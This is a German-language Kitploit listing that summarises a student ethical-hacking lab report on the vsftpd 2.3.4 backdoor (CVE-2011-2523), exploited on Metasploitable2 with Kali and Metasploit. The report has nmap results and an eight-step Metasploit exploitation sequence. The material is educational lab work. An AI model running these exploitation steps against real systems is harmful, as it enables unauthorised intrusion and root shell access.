Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ethical-hacking-CVE-2011-2523 — Ethisches Hacking Assessment | Praktische Schwachstellentests der vsftpd 2.3.4 Backdoor (CVE-2011-2523) auf Metasploitable2 mit Kali Linux & Metasploit | Kitploit
Tools/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
SchwachstellenanalyseExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

Ethisches Hacking Assessment | Praktische Schwachstellentests der vsftpd 2.3.4 Backdoor (CVE-2011-2523) auf Metasploitable2 mit Kali Linux & Metasploit

Repository anzeigen
4vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ethisches Hacken | Bewertung 1

Praktisches Schwachstellentesting - CVE-2011-2523 (vsftpd 2.3.4 Backdoor)

Modul: - Ethisches Hacken Universität: London Metropolitan University Studiengang: BSc (Hons) Cyber Security and Forensic Science

Rechtlicher Hinweis

Alle Aktivitäten wurden in einer kontrollierten, isolierten virtuellen Laborumgebung zu reinen Bildungszwecken durchgeführt. Es wurden keine realen Systeme angegriffen. Die Arbeit entspricht dem Computer Misuse Act 1990.

Laborumgebung

  • Angreifer-BS: Kali Linux (Host)
  • Angreifer-IP: 192.168.56.1 (vboxnet0)
  • Ziel-VM: Metasploitable2
  • Ziel-IP: 192.168.56.103
  • Hypervisor: Oracle VirtualBox
  • Netzwerkmodus: Host-Only (vboxnet0)

Ausgewählte CVE - CVE-2011-2523

  • CVE-ID: CVE-2011-2523
  • Betroffene Software: vsftpd 2.3.4
  • Betroffener Port: 21/tcp (FTP)
  • CVSS v3-Score: 9.8 KRITISCH
  • Angriffsvektor: Netzwerk
  • Erforderliche Privilegien: Keine
  • Referenz: https://nvd.nist.gov/vuln/detail/CVE-2011-2523

Nmap-Scannergebnisse

Port 21/tcp - vsftpd 2.3.4 (ZIEL) Port 22/tcp - OpenSSH 4.7p1 Port 23/tcp - Linux telnetd Port 80/tcp - Apache httpd 2.2.8 Port 139/tcp - Samba smbd 3.X Port 445/tcp - Samba smbd 3.X Port 3306/tcp - MySQL 5.0.51a Port 6667/tcp - UnrealIRCd

Ausbeutungszusammenfassung

Schritt 1: nmap -sn 192.168.56.0/24 Schritt 2: nmap -sV 192.168.56.103 Schritt 3: msfconsole Schritt 4: use exploit/unix/ftp/vsftpd_234_backdoor Schritt 5: set RHOSTS 192.168.56.103 Schritt 6: set LHOST 192.168.56.1 Schritt 7: run Schritt 8: id && whoami

Referenzen

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
Tool herunterladen